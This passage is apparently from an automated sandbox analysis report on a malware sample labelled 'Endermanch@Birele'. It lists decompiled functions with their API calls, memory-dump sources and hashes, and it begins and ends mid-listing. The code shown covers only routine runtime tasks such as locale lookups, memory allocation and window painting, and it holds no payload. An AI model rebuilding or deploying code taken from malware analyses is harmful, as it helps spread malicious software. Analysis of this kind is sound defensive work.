                                                                                                                                                  0x00407cce
                                                                                                                                                  0x00407ccf
                                                                                                                                                  0x00407cd5
                                                                                                                                                  0x00407cd5
                                                                                                                                                  0x00407cd7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407cd8
                                                                                                                                                  0x00407c21
                                                                                                                                                  0x00407c22
                                                                                                                                                  0x00407c26
                                                                                                                                                  0x00407c29
                                                                                                                                                  0x00407c2d
                                                                                                                                                  0x00407c4a
                                                                                                                                                  0x00407c4d
                                                                                                                                                  0x00407c54
                                                                                                                                                  0x00407c5a
                                                                                                                                                  0x00407c6e
                                                                                                                                                  0x00407c6e
                                                                                                                                                  0x00407c75
                                                                                                                                                  0x00407c86
                                                                                                                                                  0x00407c89
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407c89
                                                                                                                                                  0x00407c5c
                                                                                                                                                  0x00407c5f
                                                                                                                                                  0x00407c63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407c65
                                                                                                                                                  0x00407c68
                                                                                                                                                  0x00407c6c
                                                                                                                                                  0x00407c79
                                                                                                                                                  0x00407c7d
                                                                                                                                                  0x00407c93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407c93
                                                                                                                                                  0x00407c81
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407c81
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407c6c
                                                                                                                                                  0x00407c2f
                                                                                                                                                  0x00407c36
                                                                                                                                                  0x00407c3c
                                                                                                                                                  0x00407c43
                                                                                                                                                  0x00407c43
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407bb8
                                                                                                                                                  0x00407bb8
                                                                                                                                                  0x00407bc9
                                                                                                                                                  0x00407bd2
                                                                                                                                                  0x00407bed
                                                                                                                                                  0x00407bf8
                                                                                                                                                  0x00407c01
                                                                                                                                                  0x00407c08
                                                                                                                                                  0x00407bd4
                                                                                                                                                  0x00407bd9
                                                                                                                                                  0x00407be0
                                                                                                                                                  0x00407be0
                                                                                                                                                  0x00407c0e
                                                                                                                                                  0x00407c0f
                                                                                                                                                  0x00407c10
                                                                                                                                                  0x00407c12
                                                                                                                                                  0x00407c12
                                                                                                                                                  0x00407cd9
                                                                                                                                                  0x00407cdc
                                                                                                                                                  0x00407cdc

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406A10: GetSysColor.USER32(?), ref: 00406A1A
                                                                                                                                                  • SetTextColor.GDI32(?), ref: 00407BC9
                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00407BD9
                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00407BE0
                                                                                                                                                  • SetBkMode.GDI32(?,00000002), ref: 00407BF8
                                                                                                                                                  • SetBkColor.GDI32(?), ref: 00407C01
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$Mode$ObjectStockText
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2759950171-0
                                                                                                                                                  • Opcode ID: 69eee663e1eb35d7b5709880f5165b6fccca2c816edbe1fa8e9893acc805ec5b
                                                                                                                                                  • Instruction ID: 52b9d8afabc737b8da5f542e8778fddf4e1e7a0f474652ad9cf9c2640bd08d0b
                                                                                                                                                  • Opcode Fuzzy Hash: 69eee663e1eb35d7b5709880f5165b6fccca2c816edbe1fa8e9893acc805ec5b
                                                                                                                                                  • Instruction Fuzzy Hash: 0F31A23160C5029FE724AF29CC84A6677A1EF45304F50847BE40AAB2D3D778F885C69A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E0040C7A4(void* __esi, void* __eflags) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				long _t29;
                                                                                                                                                  				intOrPtr _t32;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  
                                                                                                                                                  				_t33 = __eflags;
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(_t32);
                                                                                                                                                  				_push(0x40c83b);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t32;
                                                                                                                                                  				E0040C51C(GetThreadLocale(), 0x40c850, 0x100b,  &_v8);
                                                                                                                                                  				_t29 = E00409A90(0x40c850, 1, _t33);
                                                                                                                                                  				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                                                                                  					EnumCalendarInfoA(E0040C6F0, GetThreadLocale(), _t29, 4);
                                                                                                                                                  					_t27 = 7;
                                                                                                                                                  					_t18 = 0x4199f4;
                                                                                                                                                  					do {
                                                                                                                                                  						 *_t18 = 0xffffffff;
                                                                                                                                                  						_t18 = _t18 + 4;
                                                                                                                                                  						_t27 = _t27 - 1;
                                                                                                                                                  					} while (_t27 != 0);
                                                                                                                                                  					EnumCalendarInfoA(E0040C72C, GetThreadLocale(), _t29, 3);
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t26);
                                                                                                                                                  				 *[fs:eax] = _t26;
                                                                                                                                                  				_push(E0040C842);
                                                                                                                                                  				return E004039AC( &_v8);
                                                                                                                                                  			}










                                                                                                                                                  0x0040c7a4
                                                                                                                                                  0x0040c7a7
                                                                                                                                                  0x0040c7ac
                                                                                                                                                  0x0040c7ad
                                                                                                                                                  0x0040c7b2
                                                                                                                                                  0x0040c7b5
                                                                                                                                                  0x0040c7cb
                                                                                                                                                  0x0040c7dd
                                                                                                                                                  0x0040c7e7
                                                                                                                                                  0x0040c7f7
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c801
                                                                                                                                                  0x0040c806
                                                                                                                                                  0x0040c806
                                                                                                                                                  0x0040c80c
                                                                                                                                                  0x0040c80f
                                                                                                                                                  0x0040c80f
                                                                                                                                                  0x0040c820
                                                                                                                                                  0x0040c820
                                                                                                                                                  0x0040c827
                                                                                                                                                  0x0040c82a
                                                                                                                                                  0x0040c82d
                                                                                                                                                  0x0040c83a

                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,0040C83B,?,?,00000000), ref: 0040C7BC
                                                                                                                                                    • Part of subcall function 0040C51C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040C83B,?,?,00000000), ref: 0040C7EC
                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000C6F0,00000000,00000000,00000004), ref: 0040C7F7
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040C83B,?,?,00000000), ref: 0040C815
                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000C72C,00000000,00000000,00000003), ref: 0040C820
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4102113445-0
                                                                                                                                                  • Opcode ID: b4efea976117dbfcd008e1303a10a6ea3ec676ac57aa519e95f612c4c2fae50d
                                                                                                                                                  • Instruction ID: 9bccf99b4e5e52be7ff95cc5428c7af3082483fe287810c798ae84d29e164835
                                                                                                                                                  • Opcode Fuzzy Hash: b4efea976117dbfcd008e1303a10a6ea3ec676ac57aa519e95f612c4c2fae50d
                                                                                                                                                  • Instruction Fuzzy Hash: 7701F771600644EBE311BB758C52B6B729CDB45728F60473AF400F76C1D67C9E005AAD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004014F4(void* __eax, void** __ecx, void* __edx) {
                                                                                                                                                  				void* _t4;
                                                                                                                                                  				void** _t9;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				long _t16;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  
                                                                                                                                                  				_t9 = __ecx;
                                                                                                                                                  				_t14 = __edx;
                                                                                                                                                  				_t17 = __eax;
                                                                                                                                                  				 *(__ecx + 4) = 0x100000;
                                                                                                                                                  				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
                                                                                                                                                  				_t13 = _t4;
                                                                                                                                                  				 *_t9 = _t13;
                                                                                                                                                  				if(_t13 == 0) {
                                                                                                                                                  					_t16 = _t14 + 0x0000ffff & 0xffff0000;
                                                                                                                                                  					_t9[1] = _t16;
                                                                                                                                                  					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
                                                                                                                                                  					 *_t9 = _t4;
                                                                                                                                                  				}
                                                                                                                                                  				if( *_t9 != 0) {
                                                                                                                                                  					_t4 = E00401344(0x4195e4, _t9);
                                                                                                                                                  					if(_t4 == 0) {
                                                                                                                                                  						VirtualFree( *_t9, 0, 0x8000);
                                                                                                                                                  						 *_t9 = 0;
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t4;
                                                                                                                                                  			}









                                                                                                                                                  0x004014f8
                                                                                                                                                  0x004014fa
                                                                                                                                                  0x004014fc
                                                                                                                                                  0x004014fe
                                                                                                                                                  0x00401512
                                                                                                                                                  0x00401517
                                                                                                                                                  0x00401519
                                                                                                                                                  0x0040151d
                                                                                                                                                  0x00401525
                                                                                                                                                  0x0040152b
                                                                                                                                                  0x00401537
                                                                                                                                                  0x0040153c
                                                                                                                                                  0x0040153c
                                                                                                                                                  0x00401541
                                                                                                                                                  0x0040154a
                                                                                                                                                  0x00401551
                                                                                                                                                  0x0040155d
                                                                                                                                                  0x00401564
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401564
                                                                                                                                                  0x00401551
                                                                                                                                                  0x0040156a

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,l.d,?,?,?,00401860), ref: 00401512
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,l.d,?,?,?,00401860), ref: 00401537
                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,l.d,?,?,?,00401860), ref: 0040155D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$Alloc$Free
                                                                                                                                                  • String ID: l.d$|.d
                                                                                                                                                  • API String ID: 3668210933-3003992340
                                                                                                                                                  • Opcode ID: f7b7489a7cc1fd0c604ba33b60ec27437cec5aa7ba496154ad775c33312cdc73
                                                                                                                                                  • Instruction ID: bba0cb97c3748fbfed120046b3edae0576dc62b48dd58dc576eb6a0b7144cf39
                                                                                                                                                  • Opcode Fuzzy Hash: f7b7489a7cc1fd0c604ba33b60ec27437cec5aa7ba496154ad775c33312cdc73
                                                                                                                                                  • Instruction Fuzzy Hash: FCF0FCB17403107BEB319E694C85F437AD8DF85B94F1040BABA08FF3DAD679580086AC
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E00407047(void* __eax, char* __ecx, void* __edx) {
                                                                                                                                                  				void* _t8;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				struct HDC__* _t28;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  				RECT* _t31;
                                                                                                                                                  
                                                                                                                                                  				_t8 = __eax + 0x14;
                                                                                                                                                  				if(_t8 == 0) {
                                                                                                                                                  					 *__ecx = 1;
                                                                                                                                                  					_t22 = _t8;
                                                                                                                                                  					_t28 =  *(__edx + 8);
                                                                                                                                                  					E00406250(_t8);
                                                                                                                                                  					_t34 =  *(_t22 + 0x35) & 0x00000001;
                                                                                                                                                  					if(( *(_t22 + 0x35) & 0x00000001) == 0) {
                                                                                                                                                  						SetBkMode(_t28, 2);
                                                                                                                                                  						SetBkColor(_t28, E00406A10( *((intOrPtr*)(_t22 + 0xa4)), _t34));
                                                                                                                                                  						SetBrushOrgEx(_t28, 0, 0, 0);
                                                                                                                                                  						_t31 = _t30 - 0x10;
                                                                                                                                                  						GetClientRect( *(_t22 + 0x1c), _t31);
                                                                                                                                                  						FillRect(_t28, _t31,  *0x418100());
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return 0;
                                                                                                                                                  			}








                                                                                                                                                  0x00407047
                                                                                                                                                  0x00407049
                                                                                                                                                  0x0040704b
                                                                                                                                                  0x00407050
                                                                                                                                                  0x00407052
                                                                                                                                                  0x00407055
                                                                                                                                                  0x0040705a
                                                                                                                                                  0x0040705e
                                                                                                                                                  0x00407063
                                                                                                                                                  0x00407075
                                                                                                                                                  0x00407080
                                                                                                                                                  0x00407085
                                                                                                                                                  0x0040708c
                                                                                                                                                  0x0040709e
                                                                                                                                                  0x004070a3
                                                                                                                                                  0x004070a7
                                                                                                                                                  0x004070aa

                                                                                                                                                  APIs
                                                                                                                                                  • SetBkMode.GDI32(?,00000002), ref: 00407063
                                                                                                                                                    • Part of subcall function 00406A10: GetSysColor.USER32(?), ref: 00406A1A
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00407075
                                                                                                                                                  • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,00000000,?,00000002), ref: 00407080
                                                                                                                                                  • GetClientRect.USER32(?), ref: 0040708C
                                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 0040709E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ColorRect$BrushClientFillMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3196769796-0
                                                                                                                                                  • Opcode ID: 9a69fc12e34aec42f221edcf021c1be237b5f42837a37956d92126f98574e677
                                                                                                                                                  • Instruction ID: 6db12d2b8c05585b70774b31dec96cf96e1eea607f94370a1883cc97d34a33cd
                                                                                                                                                  • Opcode Fuzzy Hash: 9a69fc12e34aec42f221edcf021c1be237b5f42837a37956d92126f98574e677
                                                                                                                                                  • Instruction Fuzzy Hash: 06F03062A011003AE7117A359C82E3B76ACDF92718F44847EFC00B91D3DA7E9C624A7A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E0040C854(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				signed int _t45;
                                                                                                                                                  				signed int _t47;
                                                                                                                                                  				signed int _t49;
                                                                                                                                                  				signed int _t51;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				signed int _t77;
                                                                                                                                                  				signed int _t83;
                                                                                                                                                  				signed int _t92;
                                                                                                                                                  				intOrPtr _t111;
                                                                                                                                                  				void* _t122;
                                                                                                                                                  				void* _t124;
                                                                                                                                                  				intOrPtr _t127;
                                                                                                                                                  				void* _t128;
                                                                                                                                                  
                                                                                                                                                  				_t128 = __eflags;
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_t122 = __edx;
                                                                                                                                                  				_t124 = __eax;
                                                                                                                                                  				_push(_t127);
                                                                                                                                                  				_push(0x40ca1e);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t127;
                                                                                                                                                  				_t92 = 1;
                                                                                                                                                  				E004039AC(__edx);
                                                                                                                                                  				E0040C51C(GetThreadLocale(), 0x40ca34, 0x1009,  &_v12);
                                                                                                                                                  				if(E00409A90(0x40ca34, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t41 = E00403C48(_t124);
                                                                                                                                                  						__eflags = _t92 - _t41;
                                                                                                                                                  						if(_t92 > _t41) {
                                                                                                                                                  							goto L28;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                                                                                                  						asm("bt [0x418250], eax");
                                                                                                                                                  						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                                                                                                  							_t45 = E00409F2C(_t124 + _t92 - 1, 2, 0x40ca38);
                                                                                                                                                  							__eflags = _t45;
                                                                                                                                                  							if(_t45 != 0) {
                                                                                                                                                  								_t47 = E00409F2C(_t124 + _t92 - 1, 4, 0x40ca48);
                                                                                                                                                  								__eflags = _t47;
                                                                                                                                                  								if(_t47 != 0) {
                                                                                                                                                  									_t49 = E00409F2C(_t124 + _t92 - 1, 2, 0x40ca60);
                                                                                                                                                  									__eflags = _t49;
                                                                                                                                                  									if(_t49 != 0) {
                                                                                                                                                  										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                                                                                                  										__eflags = _t51;
                                                                                                                                                  										if(_t51 == 0) {
                                                                                                                                                  											L24:
                                                                                                                                                  											E00403C50(_t122, 0x40ca78);
                                                                                                                                                  										} else {
                                                                                                                                                  											__eflags = _t51 != 0x20;
                                                                                                                                                  											if(_t51 != 0x20) {
                                                                                                                                                  												E00403B94();
                                                                                                                                                  												E00403C50(_t122, _v24);
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L24;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										E00403C50(_t122, 0x40ca6c);
                                                                                                                                                  										_t92 = _t92 + 1;
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									E00403C50(_t122, 0x40ca58);
                                                                                                                                                  									_t92 = _t92 + 3;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								E00403C50(_t122, 0x40ca44);
                                                                                                                                                  								_t92 = _t92 + 1;
                                                                                                                                                  							}
                                                                                                                                                  							_t92 = _t92 + 1;
                                                                                                                                                  							__eflags = _t92;
                                                                                                                                                  						} else {
                                                                                                                                                  							_v8 = E0040D7B8(_t124, _t92);
                                                                                                                                                  							E00403E98(_t124, _v8, _t92,  &_v20);
                                                                                                                                                  							E00403C50(_t122, _v20);
                                                                                                                                                  							_t92 = _t92 + _v8;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t75 =  *0x4199cc; // 0x9
                                                                                                                                                  					_t76 = _t75 - 4;
                                                                                                                                                  					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                                                                                  						_t77 = 1;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t77 = 0;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t77 == 0) {
                                                                                                                                                  						E00403A00(_t122, _t124);
                                                                                                                                                  					} else {
                                                                                                                                                  						while(_t92 <= E00403C48(_t124)) {
                                                                                                                                                  							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                                                                                                  							__eflags = _t83;
                                                                                                                                                  							if(_t83 != 0) {
                                                                                                                                                  								__eflags = _t83 != 0x20;
                                                                                                                                                  								if(_t83 != 0x20) {
                                                                                                                                                  									E00403B94();
                                                                                                                                                  									E00403C50(_t122, _v16);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_t92 = _t92 + 1;
                                                                                                                                                  							__eflags = _t92;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L28:
                                                                                                                                                  				_pop(_t111);
                                                                                                                                                  				 *[fs:eax] = _t111;
                                                                                                                                                  				_push(E0040CA25);
                                                                                                                                                  				return E004039D0( &_v24, 4);
                                                                                                                                                  			}























                                                                                                                                                  0x0040c854
                                                                                                                                                  0x0040c859
                                                                                                                                                  0x0040c85a
                                                                                                                                                  0x0040c85b
                                                                                                                                                  0x0040c85c
                                                                                                                                                  0x0040c85d
                                                                                                                                                  0x0040c861
                                                                                                                                                  0x0040c863
                                                                                                                                                  0x0040c867
                                                                                                                                                  0x0040c868
                                                                                                                                                  0x0040c86d
                                                                                                                                                  0x0040c870
                                                                                                                                                  0x0040c873
                                                                                                                                                  0x0040c87a
                                                                                                                                                  0x0040c892
                                                                                                                                                  0x0040c8aa
                                                                                                                                                  0x0040c9f4
                                                                                                                                                  0x0040c9f6
                                                                                                                                                  0x0040c9fb
                                                                                                                                                  0x0040c9fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c913
                                                                                                                                                  0x0040c918
                                                                                                                                                  0x0040c91f
                                                                                                                                                  0x0040c95d
                                                                                                                                                  0x0040c962
                                                                                                                                                  0x0040c964
                                                                                                                                                  0x0040c983
                                                                                                                                                  0x0040c988
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c9ab
                                                                                                                                                  0x0040c9b0
                                                                                                                                                  0x0040c9b2
                                                                                                                                                  0x0040c9c7
                                                                                                                                                  0x0040c9c7
                                                                                                                                                  0x0040c9c9
                                                                                                                                                  0x0040c9cf
                                                                                                                                                  0x0040c9d6
                                                                                                                                                  0x0040c9cb
                                                                                                                                                  0x0040c9cb
                                                                                                                                                  0x0040c9cd
                                                                                                                                                  0x0040c9e4
                                                                                                                                                  0x0040c9ee
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c9cd
                                                                                                                                                  0x0040c9b4
                                                                                                                                                  0x0040c9bb
                                                                                                                                                  0x0040c9c0
                                                                                                                                                  0x0040c9c0
                                                                                                                                                  0x0040c98c
                                                                                                                                                  0x0040c993
                                                                                                                                                  0x0040c998
                                                                                                                                                  0x0040c998
                                                                                                                                                  0x0040c966
                                                                                                                                                  0x0040c96d
                                                                                                                                                  0x0040c972
                                                                                                                                                  0x0040c972
                                                                                                                                                  0x0040c9f3
                                                                                                                                                  0x0040c9f3
                                                                                                                                                  0x0040c921
                                                                                                                                                  0x0040c92a
                                                                                                                                                  0x0040c938
                                                                                                                                                  0x0040c942
                                                                                                                                                  0x0040c947
                                                                                                                                                  0x0040c947
                                                                                                                                                  0x0040c91f
                                                                                                                                                  0x0040c8b0
                                                                                                                                                  0x0040c8b0
                                                                                                                                                  0x0040c8b5
                                                                                                                                                  0x0040c8b8
                                                                                                                                                  0x0040c8c6
                                                                                                                                                  0x0040c8c2
                                                                                                                                                  0x0040c8c2
                                                                                                                                                  0x0040c8c2
                                                                                                                                                  0x0040c8ca
                                                                                                                                                  0x0040c905
                                                                                                                                                  0x0040c8cc
                                                                                                                                                  0x0040c8f1
                                                                                                                                                  0x0040c8d2
                                                                                                                                                  0x0040c8d2
                                                                                                                                                  0x0040c8d4
                                                                                                                                                  0x0040c8d6
                                                                                                                                                  0x0040c8d8
                                                                                                                                                  0x0040c8e1
                                                                                                                                                  0x0040c8eb
                                                                                                                                                  0x0040c8eb
                                                                                                                                                  0x0040c8d8
                                                                                                                                                  0x0040c8f0
                                                                                                                                                  0x0040c8f0
                                                                                                                                                  0x0040c8f0
                                                                                                                                                  0x0040c8fc
                                                                                                                                                  0x0040c8ca
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x0040ca05
                                                                                                                                                  0x0040ca08
                                                                                                                                                  0x0040ca0b
                                                                                                                                                  0x0040ca1d

                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,0040CA1E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C883
                                                                                                                                                    • Part of subcall function 0040C51C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                                                  • Opcode ID: c5c4d1ad468f46ae4d161a4a3ed99cb74a677070df2ba8e20620db9f792e10f1
                                                                                                                                                  • Instruction ID: 85e01c6e67d729ce3c5020d352bcdb47365480f36c8352ba9020f30c33f2b255
                                                                                                                                                  • Opcode Fuzzy Hash: c5c4d1ad468f46ae4d161a4a3ed99cb74a677070df2ba8e20620db9f792e10f1
                                                                                                                                                  • Instruction Fuzzy Hash: 2C410572708149CBD701EB6988C13BEB79AEB45308B60473BA481F33C6D63C9E03961D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040E01C() {
                                                                                                                                                  				_Unknown_base(*)()* _t1;
                                                                                                                                                  				struct HINSTANCE__* _t3;
                                                                                                                                                  
                                                                                                                                                  				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                  				_t3 = _t1;
                                                                                                                                                  				if(_t3 != 0) {
                                                                                                                                                  					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                                                                                  					 *0x418274 = _t1;
                                                                                                                                                  				}
                                                                                                                                                  				if( *0x418274 == 0) {
                                                                                                                                                  					 *0x418274 = E00409E5C;
                                                                                                                                                  					return E00409E5C;
                                                                                                                                                  				}
                                                                                                                                                  				return _t1;
                                                                                                                                                  			}





                                                                                                                                                  0x0040e022
                                                                                                                                                  0x0040e027
                                                                                                                                                  0x0040e02b
                                                                                                                                                  0x0040e033
                                                                                                                                                  0x0040e038
                                                                                                                                                  0x0040e038
                                                                                                                                                  0x0040e044
                                                                                                                                                  0x0040e04b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040e04b
                                                                                                                                                  0x0040e051

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E945,00000000,0040E958), ref: 0040E022
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E033
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                                  • Opcode ID: 9362f7df9ff455d83417263436656e1e02680dce908f7494a7909927b6157796
